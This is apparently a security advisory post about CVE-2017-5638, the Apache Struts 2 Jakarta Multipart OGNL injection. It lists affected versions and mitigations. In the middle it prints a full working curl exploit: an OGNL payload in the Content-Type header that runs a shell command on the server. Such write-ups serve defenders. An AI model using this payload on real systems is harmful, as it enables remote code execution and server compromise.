Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a server processing file uploads. Normally, this header specifies the MIME type of the uploaded data. However, if the header contains an invalid value, the framework attempts to generate an error message. It does this by passing the user-supplied `Content-Type` string directly into an OGNL (Object-Graph Navigation Language) expression. This is a severe mishandling because OGNL is a powerful expression language that can execute Java code. An attacker can embed OGNL expressions within the `Content-Type` header. When the flawed exception handling logic triggers, it interprets these expressions instead of treating them as a string, leading to the execution of arbitrary system commands on the server with the application’s privileges, effectively granting full control to the attacker.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`
How Exploit:
Craft malicious Content-Type header.
Target vulnerable Struts endpoint.
OGNL expression execution.
Gains shell command execution.
Protection from this CVE
Apply vendor patch.
Upgrade Struts version.
Use input validation.
WAF rule deployment.
Impact:
Remote Code Execution.
Complete system compromise.
Data breach potential.
Service disruption.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
